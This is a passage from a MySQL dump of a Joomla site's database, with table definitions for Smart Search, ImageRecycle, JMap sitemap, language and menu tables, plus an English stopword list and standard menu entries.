PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_termsa`
--
LOCK TABLES `atlyh_finder_links_termsa` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_termsa` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_termsa` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_termsb`
--
DROP TABLE IF EXISTS `atlyh_finder_links_termsb`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_termsb` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_termsb`
--
LOCK TABLES `atlyh_finder_links_termsb` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_termsb` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_termsb` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_termsc`
--
DROP TABLE IF EXISTS `atlyh_finder_links_termsc`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_termsc` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_termsc`
--
LOCK TABLES `atlyh_finder_links_termsc` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_termsc` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_termsc` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_termsd`
--
DROP TABLE IF EXISTS `atlyh_finder_links_termsd`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_termsd` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_termsd`
--
LOCK TABLES `atlyh_finder_links_termsd` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_termsd` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_termsd` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_termse`
--
DROP TABLE IF EXISTS `atlyh_finder_links_termse`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_termse` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_termse`
--
LOCK TABLES `atlyh_finder_links_termse` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_termse` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_termse` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_links_termsf`
--
DROP TABLE IF EXISTS `atlyh_finder_links_termsf`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_links_termsf` (
`link_id` int(10) unsigned NOT NULL,
`term_id` int(10) unsigned NOT NULL,
`weight` float unsigned NOT NULL,
PRIMARY KEY (`link_id`,`term_id`),
KEY `idx_term_weight` (`term_id`,`weight`),
KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_links_termsf`
--
LOCK TABLES `atlyh_finder_links_termsf` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_links_termsf` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_links_termsf` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_taxonomy`
--
DROP TABLE IF EXISTS `atlyh_finder_taxonomy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_taxonomy` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`parent_id` int(10) unsigned NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL,
`state` tinyint(1) unsigned NOT NULL DEFAULT 1,
`access` tinyint(1) unsigned NOT NULL DEFAULT 0,
`ordering` tinyint(1) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `parent_id` (`parent_id`),
KEY `state` (`state`),
KEY `ordering` (`ordering`),
KEY `access` (`access`),
KEY `idx_parent_published` (`parent_id`,`state`,`access`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_taxonomy`
--
LOCK TABLES `atlyh_finder_taxonomy` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_taxonomy` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_taxonomy_map`
--
DROP TABLE IF EXISTS `atlyh_finder_taxonomy_map`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_taxonomy_map` (
`link_id` int(10) unsigned NOT NULL,
`node_id` int(10) unsigned NOT NULL,
PRIMARY KEY (`link_id`,`node_id`),
KEY `link_id` (`link_id`),
KEY `node_id` (`node_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_taxonomy_map`
--
LOCK TABLES `atlyh_finder_taxonomy_map` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_taxonomy_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_taxonomy_map` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_terms`
--
DROP TABLE IF EXISTS `atlyh_finder_terms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_terms` (
`term_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`term` varchar(75) NOT NULL,
`stem` varchar(75) NOT NULL,
`common` tinyint(1) unsigned NOT NULL DEFAULT 0,
`phrase` tinyint(1) unsigned NOT NULL DEFAULT 0,
`weight` float unsigned NOT NULL DEFAULT 0,
`soundex` varchar(75) NOT NULL,
`links` int(10) NOT NULL DEFAULT 0,
`language` char(3) NOT NULL DEFAULT '',
PRIMARY KEY (`term_id`),
UNIQUE KEY `idx_term` (`term`),
KEY `idx_term_phrase` (`term`,`phrase`),
KEY `idx_stem_phrase` (`stem`,`phrase`),
KEY `idx_soundex_phrase` (`soundex`,`phrase`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_terms`
--
LOCK TABLES `atlyh_finder_terms` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_terms` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_terms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_terms_common`
--
DROP TABLE IF EXISTS `atlyh_finder_terms_common`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_terms_common` (
`term` varchar(75) NOT NULL,
`language` varchar(3) NOT NULL,
KEY `idx_word_lang` (`term`,`language`),
KEY `idx_lang` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_terms_common`
--
LOCK TABLES `atlyh_finder_terms_common` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_terms_common` DISABLE KEYS */;
INSERT INTO `atlyh_finder_terms_common` VALUES ('a','en'),('about','en'),('after','en'),('ago','en'),('all','en'),('am','en'),('an','en'),('and','en'),('ani','en'),('any','en'),('are','en'),('aren\'t','en'),('as','en'),('at','en'),('be','en'),('but','en'),('by','en'),('for','en'),('from','en'),('get','en'),('go','en'),('how','en'),('if','en'),('in','en'),('into','en'),('is','en'),('isn\'t','en'),('it','en'),('its','en'),('me','en'),('more','en'),('most','en'),('must','en'),('my','en'),('new','en'),('no','en'),('none','en'),('not','en'),('noth','en'),('nothing','en'),('of','en'),('off','en'),('often','en'),('old','en'),('on','en'),('onc','en'),('once','en'),('onli','en'),('only','en'),('or','en'),('other','en'),('our','en'),('ours','en'),('out','en'),('over','en'),('page','en'),('she','en'),('should','en'),('small','en'),('so','en'),('some','en'),('than','en'),('thank','en'),('that','en'),('the','en'),('their','en'),('theirs','en'),('them','en'),('then','en'),('there','en'),('these','en'),('they','en'),('this','en'),('those','en'),('thus','en'),('time','en'),('times','en'),('to','en'),('too','en'),('true','en'),('under','en'),('until','en'),('up','en'),('upon','en'),('use','en'),('user','en'),('users','en'),('veri','en'),('version','en'),('very','en'),('via','en'),('want','en'),('was','en'),('way','en'),('were','en'),('what','en'),('when','en'),('where','en'),('whi','en'),('which','en'),('who','en'),('whom','en'),('whose','en'),('why','en'),('wide','en'),('will','en'),('with','en'),('within','en'),('without','en'),('would','en'),('yes','en'),('yet','en'),('you','en'),('your','en'),('yours','en');
/*!40000 ALTER TABLE `atlyh_finder_terms_common` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_tokens`
--
DROP TABLE IF EXISTS `atlyh_finder_tokens`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_tokens` (
`term` varchar(75) NOT NULL,
`stem` varchar(75) NOT NULL,
`common` tinyint(1) unsigned NOT NULL DEFAULT 0,
`phrase` tinyint(1) unsigned NOT NULL DEFAULT 0,
`weight` float unsigned NOT NULL DEFAULT 1,
`context` tinyint(1) unsigned NOT NULL DEFAULT 2,
`language` char(3) NOT NULL DEFAULT '',
KEY `idx_word` (`term`),
KEY `idx_context` (`context`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_tokens`
--
LOCK TABLES `atlyh_finder_tokens` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_tokens` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_tokens_aggregate`
--
DROP TABLE IF EXISTS `atlyh_finder_tokens_aggregate`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_tokens_aggregate` (
`term_id` int(10) unsigned NOT NULL,
`map_suffix` char(1) NOT NULL,
`term` varchar(75) NOT NULL,
`stem` varchar(75) NOT NULL,
`common` tinyint(1) unsigned NOT NULL DEFAULT 0,
`phrase` tinyint(1) unsigned NOT NULL DEFAULT 0,
`term_weight` float unsigned NOT NULL,
`context` tinyint(1) unsigned NOT NULL DEFAULT 2,
`context_weight` float unsigned NOT NULL,
`total_weight` float unsigned NOT NULL,
`language` char(3) NOT NULL DEFAULT '',
KEY `token` (`term`),
KEY `keyword_id` (`term_id`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_tokens_aggregate`
--
LOCK TABLES `atlyh_finder_tokens_aggregate` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_tokens_aggregate` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_tokens_aggregate` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_finder_types`
--
DROP TABLE IF EXISTS `atlyh_finder_types`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_finder_types` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(100) NOT NULL,
`mime` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `title` (`title`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_finder_types`
--
LOCK TABLES `atlyh_finder_types` WRITE;
/*!40000 ALTER TABLE `atlyh_finder_types` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_finder_types` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_imagerecycle_files`
--
DROP TABLE IF EXISTS `atlyh_imagerecycle_files`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_imagerecycle_files` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`file` varchar(250) NOT NULL,
`md5` varchar(32) NOT NULL,
`extension` varchar(5) NOT NULL,
`api_id` int(11) NOT NULL,
`size_before` int(11) NOT NULL,
`size_after` int(11) NOT NULL,
`date` datetime NOT NULL,
`expiration_date` datetime NOT NULL,
`status` varchar(32) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_imagerecycle_files`
--
LOCK TABLES `atlyh_imagerecycle_files` WRITE;
/*!40000 ALTER TABLE `atlyh_imagerecycle_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_imagerecycle_files` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_jmap`
--
DROP TABLE IF EXISTS `atlyh_jmap`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_jmap` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`type` varchar(100) NOT NULL,
`name` text NOT NULL,
`description` text NOT NULL,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`published` tinyint(1) NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
`sqlquery` text DEFAULT NULL,
`sqlquery_managed` text DEFAULT NULL,
`params` text NOT NULL,
PRIMARY KEY (`id`),
KEY `published` (`published`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_jmap`
--
LOCK TABLES `atlyh_jmap` WRITE;
/*!40000 ALTER TABLE `atlyh_jmap` DISABLE KEYS */;
INSERT INTO `atlyh_jmap` VALUES (1,'content','Content','Default contents source',0,'0000-00-00 00:00:00',1,1,'','','');
/*!40000 ALTER TABLE `atlyh_jmap` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_jmap_cats_priorities`
--
DROP TABLE IF EXISTS `atlyh_jmap_cats_priorities`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_jmap_cats_priorities` (
`id` int(11) NOT NULL,
`priority` char(3) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_jmap_cats_priorities`
--
LOCK TABLES `atlyh_jmap_cats_priorities` WRITE;
/*!40000 ALTER TABLE `atlyh_jmap_cats_priorities` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_jmap_cats_priorities` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_jmap_datasets`
--
DROP TABLE IF EXISTS `atlyh_jmap_datasets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_jmap_datasets` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`name` text NOT NULL,
`description` text NOT NULL,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`published` tinyint(1) NOT NULL DEFAULT 0,
`sources` text NOT NULL,
PRIMARY KEY (`id`),
KEY `published` (`published`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_jmap_datasets`
--
LOCK TABLES `atlyh_jmap_datasets` WRITE;
/*!40000 ALTER TABLE `atlyh_jmap_datasets` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_jmap_datasets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_jmap_dss_relations`
--
DROP TABLE IF EXISTS `atlyh_jmap_dss_relations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_jmap_dss_relations` (
`datasetid` int(11) NOT NULL,
`datasourceid` int(11) NOT NULL,
PRIMARY KEY (`datasetid`,`datasourceid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_jmap_dss_relations`
--
LOCK TABLES `atlyh_jmap_dss_relations` WRITE;
/*!40000 ALTER TABLE `atlyh_jmap_dss_relations` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_jmap_dss_relations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_jmap_menu_priorities`
--
DROP TABLE IF EXISTS `atlyh_jmap_menu_priorities`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_jmap_menu_priorities` (
`id` int(11) NOT NULL,
`priority` char(3) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_jmap_menu_priorities`
--
LOCK TABLES `atlyh_jmap_menu_priorities` WRITE;
/*!40000 ALTER TABLE `atlyh_jmap_menu_priorities` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_jmap_menu_priorities` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_jmap_pingomatic`
--
DROP TABLE IF EXISTS `atlyh_jmap_pingomatic`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_jmap_pingomatic` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`blogurl` varchar(255) NOT NULL,
`rssurl` varchar(255) DEFAULT NULL,
`services` text NOT NULL,
`lastping` datetime DEFAULT NULL,
`checked_out` int(11) NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_jmap_pingomatic`
--
LOCK TABLES `atlyh_jmap_pingomatic` WRITE;
/*!40000 ALTER TABLE `atlyh_jmap_pingomatic` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_jmap_pingomatic` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_languages`
--
DROP TABLE IF EXISTS `atlyh_languages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_languages` (
`lang_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`lang_code` char(7) NOT NULL,
`title` varchar(50) NOT NULL,
`title_native` varchar(50) NOT NULL,
`sef` varchar(50) NOT NULL,
`image` varchar(50) NOT NULL,
`description` varchar(512) NOT NULL,
`metakey` text NOT NULL,
`metadesc` text NOT NULL,
`sitename` varchar(1024) NOT NULL DEFAULT '',
`published` int(11) NOT NULL DEFAULT 0,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`lang_id`),
UNIQUE KEY `idx_sef` (`sef`),
UNIQUE KEY `idx_image` (`image`),
UNIQUE KEY `idx_langcode` (`lang_code`),
KEY `idx_access` (`access`),
KEY `idx_ordering` (`ordering`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_languages`
--
LOCK TABLES `atlyh_languages` WRITE;
/*!40000 ALTER TABLE `atlyh_languages` DISABLE KEYS */;
INSERT INTO `atlyh_languages` VALUES (1,'en-GB','English (UK)','English (UK)','en','en','','','','',1,1,1);
/*!40000 ALTER TABLE `atlyh_languages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_menu`
--
DROP TABLE IF EXISTS `atlyh_menu`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_menu` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`menutype` varchar(24) NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype',
`title` varchar(255) NOT NULL COMMENT 'The display title of the menu item.',
`alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT 'The SEF alias of the menu item.',
`note` varchar(255) NOT NULL DEFAULT '',
`path` varchar(1024) NOT NULL COMMENT 'The computed path of the menu item based on the alias field.',
`link` varchar(1024) NOT NULL COMMENT 'The actually link the menu item refers to.',
`type` varchar(16) NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator',
`published` tinyint(4) NOT NULL DEFAULT 0 COMMENT 'The published state of the menu link.',
`parent_id` int(10) unsigned NOT NULL DEFAULT 1 COMMENT 'The parent menu item in the menu tree.',
`level` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'The relative level in the tree.',
`component_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to #__extensions.id',
`checked_out` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to #__users.id',
`checked_out_time` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.',
`browserNav` tinyint(4) NOT NULL DEFAULT 0 COMMENT 'The click behaviour of the link.',
`access` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'The access level required to view the menu item.',
`img` varchar(255) NOT NULL COMMENT 'The image of the menu item.',
`template_style_id` int(10) unsigned NOT NULL DEFAULT 0,
`params` text NOT NULL COMMENT 'JSON encoded data for the menu item.',
`lft` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set lft.',
`rgt` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set rgt.',
`home` tinyint(3) unsigned NOT NULL DEFAULT 0 COMMENT 'Indicates if this menu item is the home or default page.',
`language` char(7) NOT NULL DEFAULT '',
`client_id` tinyint(4) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`,`language`),
KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`),
KEY `idx_menutype` (`menutype`),
KEY `idx_left_right` (`lft`,`rgt`),
KEY `idx_alias` (`alias`),
KEY `idx_path` (`path`(255)),
KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=554 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_menu`
--
LOCK TABLES `atlyh_menu` WRITE;
/*!40000 ALTER TABLE `atlyh_menu` DISABLE KEYS */;
INSERT INTO `atlyh_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,205,0,'*',0),(2,'menu','com_banners','Banners','','Banners','index.php?option=com_banners','component',0,1,1,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',1,10,0,'*',1),(3,'menu','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',2,3,0,'*',1),(4,'menu','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',0,2,2,6,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',4,5,0,'*',1),(5,'menu','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',6,7,0,'*',1),(6,'menu','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',8,9,0,'*',1),(7,'menu','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',0,1,1,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',113,118,0,'*',1),(8,'menu','com_contact','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',0,7,2,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',114,115,0,'*',1),(9,'menu','com_contact_categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',0,7,2,6,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',116,117,0,'*',1),(10,'menu','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',0,1,1,15,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',119,124,0,'*',1),(11,'menu','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',120,121,0,'*',1),(12,'menu','com_messages_read','Read Private Message','','Messaging/Read Private Message','index.php?option=com_messages','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-read',0,'',122,123,0,'*',1),(13,'menu','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',0,1,1,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',125,130,0,'*',1),(14,'menu','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',0,13,2,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',126,127,0,'*',1),(15,'menu','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',0,13,2,6,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',128,129,0,'*',1),(16,'menu','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',0,1,1,24,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',137,138,0,'*',1),(17,'menu','com_search','Basic Search','','Basic Search','index.php?option=com_search','component',0,1,1,19,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',135,136,0,'*',1),(21,'menu','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',0,1,1,27,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',133,134,0,'*',1),(22,'menu','com_joomlaupdate','Joomla! Update','','Joomla! Update','index.php?option=com_joomlaupdate','component',0,1,1,28,0,'0000-00-00 00:00:00',0,0,'class:joomlaupdate',0,'',131,132,0,'*',1),(201,'usermenu','Your Profile','your-profile','','your-profile','index.php?option=com_users&view=profile','component',1,1,1,25,0,'0000-00-00 